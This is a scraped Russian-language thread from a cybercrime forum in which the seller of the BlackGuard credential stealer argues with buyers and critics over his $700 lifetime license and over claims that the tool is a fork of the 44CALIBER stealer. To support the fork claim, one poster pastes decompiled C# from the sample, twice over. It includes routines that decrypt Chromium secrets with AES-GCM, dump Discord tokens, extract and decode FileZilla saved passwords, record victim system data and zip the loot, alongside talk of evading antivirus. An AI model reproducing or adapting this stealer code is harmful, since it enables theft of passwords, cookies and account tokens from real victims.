Ну в этом вся твоя проблема, ты не умеешь слушать.
Ну я уже говорил тут ни один раз, если дотнеты уметь готовить, то они збс. Там есть много неочевидных сначала вещей, которыми можно аверов удивить.
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Техническое обсуждение стилера BlackGuard
- Автор темы c0d3r_0f_shr0d13ng3r
- Дата начала
- Автор темы
- Добавить закладку
- #42
Мне просто жалко людей, которые за 700$ покупают себе кривой софт, костыли и дыры в панели.Стоил бы твой софт 500р, вопросов бы никто не имел)
Еще пока чистым с можно удивить, шарп разумется да тоже. Фантазия братик, есть же
за 700$ они покупают не просто панель и билд а пожизненную лицензию на использование моего софта
чистка, обновление и так далее для них это все бесплатно и ни с одного покупателя я доп платежи не требовал никогда
сервак если блокают то бесплатно делается ребилд на новую панель
Последнее редактирование:
Вынес сообщения в отдельную тему, в соответствующий раздел (техническое обсуждение). Тут можно дальше обсудить.
спасибо
c0d3r_0f_shr0d13ng3r читал статью со слезами на глазах от смеха и от боли xD говнокод это вроде как не страшно если он работает и безопасен.
но вот залив шела в панель это просто браво. хуже только найти фтп сервер с кредами захардкоженными.
но вот залив шела в панель это просто браво. хуже только найти фтп сервер с кредами захардкоженными.
А будет ахуенная история твоего камбека?
А в чем проблема сразу создать
.htaccess и не мучать себя и клиентов лишними телодвижениями? А если у меня вообще будет не Apache (который как раз таки и работает с этим файлом, другие вебсерверы срали на него с высоты колокольной башни), а nginx или IIS (не юзаю его, просто поставил в качестве примера)? Получается что каждый сможет залезть в мою папку с логами:/Я конечно не видел инструкцию по установке (если она вообще существует), или же если ты сам настраиваешь это "чудо" своим клиентам, но панель и логи грузились от рута... Рукалицо, ибо на безопастность клиентов ты тоже чихать хотел.
Про панель (простите, итальянскую пасту) я промолчу...
Это же форк 44 Caliber
Его же лоадер
И гитхаб с "наработками"
Его же лоадер
И гитхаб с "наработками"
blackteam1 - Overview
blackteam1 has 8 repositories available. Follow their code on GitHub.
github.com
Это же форк 44 Caliber
Его же лоадер
И гитхаб с "наработками"
blackteam1 - Overview
blackteam1 has 8 repositories available. Follow their code on GitHub.github.com
Не работает · Issue #13 · EgeBalci/amber
Любой файл который провожу через amber ломается пишет не возможно запустить файл на вашем пк
github.com
AntiVM · Issue #1 · Back-X/anti-vm
this is all great, but there is one thing, but this code simply determines the real PC or it is a virtual machine, but the program still continues to work even if it was determined that it is a vir...
github.com
+- все "стилаки" на C# это форк одного говна, ну либо это всё делает один и тот же индус
если клиенты сами устанавливают то скидываю им инструкцию где подробно расписываю что куда
это всего лишь слова не более я даже внимания на этом свое не акцентрирую мне глубоко наплевать на мнение какого то чудо реверсера который посчитал что это форк 44 калибра)))Это же форк 44 Caliber
Его же лоадер
И гитхаб с "наработками"
blackteam1 - Overview
blackteam1 has 8 repositories available. Follow their code on GitHub.github.com
GitHub - razexgod/44CALIBER: Password+Cookies and more stealer, with sending logs into your Discord channel
Password+Cookies and more stealer, with sending logs into your Discord channel - GitHub - razexgod/44CALIBER: Password+Cookies and more stealer, with sending logs into your Discord channel
github.com
Ты заврался, остановись пока не поздно
Еще раз, для тупых и альтернативно тупых:
На самом деле очень много совпадений с кодом из Калибра, куда не глянь. Это не то, чтобы прям плохо, но отрицать, что очень большое количество кода было взято из Калибра попросту бессмысленно. Ну хоть не из СтормКитти, и то хорошо))
C#:
// Token: 0x060001B0 RID: 432 RVA: 0x00007220 File Offset: 0x00005420
private static string smethod_0(gefuirgiofw gefuirgiofw_0)
{
return string.Concat(new string[]
{
"Hostname: ",
gefuirgiofw_0.nLru,
"\nUsername: ",
gefuirgiofw_0.String_0,
"\nPassword: ",
gefuirgiofw_0.dalevocomo,
"\n\n"
});
}
44CALIBER/44CALIBER/Targets/Браузеры/Helpers/Utils.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
// Token: 0x060001B2 RID: 434 RVA: 0x00003742 File Offset: 0x00001942
private static string smethod_2(Struct1 struct1_0)
{
return string.Format("### {0} ### ({1}) {2}\n", struct1_0.method_2(), struct1_0.method_0(), struct1_0.method_4());
}44CALIBER/44CALIBER/Targets/Браузеры/Helpers/Utils.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
// Token: 0x06000049 RID: 73 RVA: 0x00005854 File Offset: 0x00003A54
public static void smethod_0()
{
string nika = metadol.nika;
string contents = string.Concat(new string[]
{
"\n ==================================================\n ================== BG****_v3.5 ==============\n ==================================================\n ==================================================\n IP: ",
Class1.string_0,
"\n ==================================================\n Country: ",
Class19.string_4,
"\n ==================================================\n ID: ",
Class18.smethod_0(),
"\n ==================================================\n OS: ",
Class19.string_3,
"\n ==================================================\n Log Date: ",
metadol.redilka,
"\n =================================================="
});
File.WriteAllText(nika + "\\\\Information.txt", contents);
}44CALIBER/44CALIBER/Targets/Информация/SystemInfo.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
public byte[] method_0(byte[] byte_0, byte[] byte_1, byte[] byte_2, byte[] byte_3, byte[] byte_4)
{
IntPtr intPtr = this.method_2(judicony.BCRYPT_AES_ALGORITHM, judicony.MS_PRIMITIVE_PROVIDER, judicony.BCRYPT_CHAIN_MODE_GCM);
IntPtr intPtr2;
IntPtr hglobal = this.method_3(intPtr, byte_0, out intPtr2);
judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO bcrypt_AUTHENTICATED_CIPHER_MODE_INFO = new judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte_1, byte_2, byte_4);
byte[] array2;
using (bcrypt_AUTHENTICATED_CIPHER_MODE_INFO)
{
byte[] array = new byte[this.method_1(intPtr)];
int num = 0;
uint num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, null, 0, ref num, 0);
if (num2 != 0U)
{
throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", num2));
}
array2 = new byte[num];
num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, array2, array2.Length, ref num, 0);
if (num2 == judicony.STATUS_AUTH_TAG_MISMATCH)
{
throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch");
}
if (num2 != 0U)
{
throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", num2));
}
}
judicony.BCryptDestroyKey(intPtr2);
Marshal.FreeHGlobal(hglobal);
judicony.BCryptCloseAlgorithmProvider(intPtr, 0U);
return array2;
}44CALIBER/44CALIBER/Targets/Браузеры/Targets/Browsers/Chromium/AesGcm.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866")))
{
zipFile.ParallelDeflateThreshold = -1L;
zipFile.UseZip64WhenSaving = 2;
zipFile.CompressionLevel = 0;
zipFile.AddDirectory(metadol.nika);
zipFile.Save(text);
}44CALIBER/44CALIBER/Program.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
// Token: 0x0600021D RID: 541 RVA: 0x00008380 File Offset: 0x00006580
public static void smethod_1()
{
try
{
string text = metadol.nika + "\\\\Discord";
string[] array = Class20.smethod_2();
if (array.Length != 0)
{
Directory.CreateDirectory(text);
foreach (string str in array)
{
File.AppendAllText(text + "\\\\Tokens.txt", str + "\n");
}
}
Class20.MxHbaqRmoa();
}
catch (Exception value)
{
Console.WriteLine(value);
}
}44CALIBER/44CALIBER/Targets/Discord/Discord.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
C#:
// Token: 0x0600023D RID: 573 RVA: 0x00008968 File Offset: 0x00006B68
public static void smethod_2(string string_1, string string_2, string string_3 = "RecentServers", string string_4 = "Server")
{
checked
{
try
{
if (File.Exists(string_1))
{
XmlDocument xmlDocument = new XmlDocument();
xmlDocument.Load(string_1);
foreach (object obj in ((XmlElement)xmlDocument.GetElementsByTagName(string_3)[0]).GetElementsByTagName(string_4))
{
XmlElement xmlElement = (XmlElement)obj;
string innerText = xmlElement.GetElementsByTagName("Host")[0].InnerText;
string innerText2 = xmlElement.GetElementsByTagName("Port")[0].InnerText;
string innerText3 = xmlElement.GetElementsByTagName("User")[0].InnerText;
string @string = Encoding.UTF8.GetString(Convert.FromBase64String(xmlElement.GetElementsByTagName("Pass")[0].InnerText));
if (string.IsNullOrEmpty(innerText) || string.IsNullOrEmpty(innerText2) || string.IsNullOrEmpty(innerText3) || string.IsNullOrEmpty(@string))
{
break;
}
Class21.stringBuilder_0.AppendLine("link: " + innerText);
Class21.stringBuilder_0.AppendLine("Port: " + innerText2);
Class21.stringBuilder_0.AppendLine("Uname: " + innerText3);
Class21.stringBuilder_0.AppendLine("pws: " + @string + "\r\n");
Class5.int_8++;
}
if (Class21.stringBuilder_0.Length > 0)
{
File.AppendAllText(string_2, Class21.stringBuilder_0.ToString());
}
}
}
catch (Exception value)
{
Console.WriteLine(value);
}
}
}44CALIBER/44CALIBER/Targets/FileZilla/FileZilla.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBER
github.com
...ну и так можно продолжать очень долго, по сути весь функционал по стиллингу всякого разного был
ты шары разуй то что ты на скрине кидаешь это вообще никак не относится к новой версии моего софта из этого следует что мне глубоко начхать на твои высеры веришь нетПосмотреть вложение 35639Посмотреть вложение 35640
Посмотреть вложение 35641Посмотреть вложение 35642GitHub - razexgod/44CALIBER: Password+Cookies and more stealer, with sending logs into your Discord channel
Password+Cookies and more stealer, with sending logs into your Discord channel - GitHub - razexgod/44CALIBER: Password+Cookies and more stealer, with sending logs into your Discord channelgithub.com
Ты заврался, остановись пока не поздно
у меня нету отстука в телегу от слова вообще есть только через панель отправка текстовых уведомлений не более лол
а то что в стилаке используется bcrypt и что из этого? bcrypt этот вообще никак не относится к стиллинку куков и пути похожие как во многих стилаках вы ебанулись совсем чтоли? разве запрещено использовать пути или что больше комментариев не будет.
Да все разрешено, в том числе и пиздить код из оупенсорса и продавать его (если совесть позволяет себе это разрешить). Но ты отрицаешь, что это форк Калибра, а я говорю, что отрицать это бессмысленно, очень много кода оттуда совпадает с семплом твоего продукта.
Панель хакфора от эвриал ещё добавьте)На самом деле очень много совпадений с кодом из Калибра, куда не глянь. Это не то, чтобы прям плохо, но отрицать, что очень большое количество кода было взято из Калибра попросту бессмысленно. Ну хоть не из СтормКитти, и то хорошо))
C#:// Token: 0x060001B0 RID: 432 RVA: 0x00007220 File Offset: 0x00005420 private static string smethod_0(gefuirgiofw gefuirgiofw_0) { return string.Concat(new string[] { "Hostname: ", gefuirgiofw_0.nLru, "\nUsername: ", gefuirgiofw_0.String_0, "\nPassword: ", gefuirgiofw_0.dalevocomo, "\n\n" }); }44CALIBER/44CALIBER/Targets/Браузеры/Helpers/Utils.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:// Token: 0x060001B2 RID: 434 RVA: 0x00003742 File Offset: 0x00001942 private static string smethod_2(Struct1 struct1_0) { return string.Format("### {0} ### ({1}) {2}\n", struct1_0.method_2(), struct1_0.method_0(), struct1_0.method_4()); }44CALIBER/44CALIBER/Targets/Браузеры/Helpers/Utils.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:// Token: 0x06000049 RID: 73 RVA: 0x00005854 File Offset: 0x00003A54 public static void smethod_0() { string nika = metadol.nika; string contents = string.Concat(new string[] { "\n ==================================================\n ================== BG****_v3.5 ==============\n ==================================================\n ==================================================\n IP: ", Class1.string_0, "\n ==================================================\n Country: ", Class19.string_4, "\n ==================================================\n ID: ", Class18.smethod_0(), "\n ==================================================\n OS: ", Class19.string_3, "\n ==================================================\n Log Date: ", metadol.redilka, "\n ==================================================" }); File.WriteAllText(nika + "\\\\Information.txt", contents); }44CALIBER/44CALIBER/Targets/Информация/SystemInfo.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:public byte[] method_0(byte[] byte_0, byte[] byte_1, byte[] byte_2, byte[] byte_3, byte[] byte_4) { IntPtr intPtr = this.method_2(judicony.BCRYPT_AES_ALGORITHM, judicony.MS_PRIMITIVE_PROVIDER, judicony.BCRYPT_CHAIN_MODE_GCM); IntPtr intPtr2; IntPtr hglobal = this.method_3(intPtr, byte_0, out intPtr2); judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO bcrypt_AUTHENTICATED_CIPHER_MODE_INFO = new judicony.BCRYPT_AUTHENTICATED_CIPHER_MODE_INFO(byte_1, byte_2, byte_4); byte[] array2; using (bcrypt_AUTHENTICATED_CIPHER_MODE_INFO) { byte[] array = new byte[this.method_1(intPtr)]; int num = 0; uint num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, null, 0, ref num, 0); if (num2 != 0U) { throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() (get size) failed with status code: {0}", num2)); } array2 = new byte[num]; num2 = judicony.BCryptDecrypt(intPtr2, byte_3, byte_3.Length, ref bcrypt_AUTHENTICATED_CIPHER_MODE_INFO, array, array.Length, array2, array2.Length, ref num, 0); if (num2 == judicony.STATUS_AUTH_TAG_MISMATCH) { throw new CryptographicException("BCrypt.BCryptDecrypt(): authentication tag mismatch"); } if (num2 != 0U) { throw new CryptographicException(string.Format("BCrypt.BCryptDecrypt() failed with status code:{0}", num2)); } } judicony.BCryptDestroyKey(intPtr2); Marshal.FreeHGlobal(hglobal); judicony.BCryptCloseAlgorithmProvider(intPtr, 0U); return array2; }44CALIBER/44CALIBER/Targets/Браузеры/Targets/Browsers/Chromium/AesGcm.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:using (ZipFile zipFile = new ZipFile(Encoding.GetEncoding("cp866"))) { zipFile.ParallelDeflateThreshold = -1L; zipFile.UseZip64WhenSaving = 2; zipFile.CompressionLevel = 0; zipFile.AddDirectory(metadol.nika); zipFile.Save(text); }44CALIBER/44CALIBER/Program.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:// Token: 0x0600021D RID: 541 RVA: 0x00008380 File Offset: 0x00006580 public static void smethod_1() { try { string text = metadol.nika + "\\\\Discord"; string[] array = Class20.smethod_2(); if (array.Length != 0) { Directory.CreateDirectory(text); foreach (string str in array) { File.AppendAllText(text + "\\\\Tokens.txt", str + "\n"); } } Class20.MxHbaqRmoa(); } catch (Exception value) { Console.WriteLine(value); } }44CALIBER/44CALIBER/Targets/Discord/Discord.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
C#:// Token: 0x0600023D RID: 573 RVA: 0x00008968 File Offset: 0x00006B68 public static void smethod_2(string string_1, string string_2, string string_3 = "RecentServers", string string_4 = "Server") { checked { try { if (File.Exists(string_1)) { XmlDocument xmlDocument = new XmlDocument(); xmlDocument.Load(string_1); foreach (object obj in ((XmlElement)xmlDocument.GetElementsByTagName(string_3)[0]).GetElementsByTagName(string_4)) { XmlElement xmlElement = (XmlElement)obj; string innerText = xmlElement.GetElementsByTagName("Host")[0].InnerText; string innerText2 = xmlElement.GetElementsByTagName("Port")[0].InnerText; string innerText3 = xmlElement.GetElementsByTagName("User")[0].InnerText; string @string = Encoding.UTF8.GetString(Convert.FromBase64String(xmlElement.GetElementsByTagName("Pass")[0].InnerText)); if (string.IsNullOrEmpty(innerText) || string.IsNullOrEmpty(innerText2) || string.IsNullOrEmpty(innerText3) || string.IsNullOrEmpty(@string)) { break; } Class21.stringBuilder_0.AppendLine("link: " + innerText); Class21.stringBuilder_0.AppendLine("Port: " + innerText2); Class21.stringBuilder_0.AppendLine("Uname: " + innerText3); Class21.stringBuilder_0.AppendLine("pws: " + @string + "\r\n"); Class5.int_8++; } if (Class21.stringBuilder_0.Length > 0) { File.AppendAllText(string_2, Class21.stringBuilder_0.ToString()); } } } catch (Exception value) { Console.WriteLine(value); } } }44CALIBER/44CALIBER/Targets/FileZilla/FileZilla.cs at e9848a42a47540d8f4093f351d992d17fc1bab2d · razexgod/44CALIBER
Password+Cookies and more stealer, with sending logs into your Discord channel - razexgod/44CALIBERgithub.com
...ну и так можно продолжать очень долго, по сути весь функционал по стиллингу всякого разного былзастилленпозаимствован из Калибра. Как бы форк это или нет, можно рассусоливать и спорить об этом, но факты "заимствования" на лицо.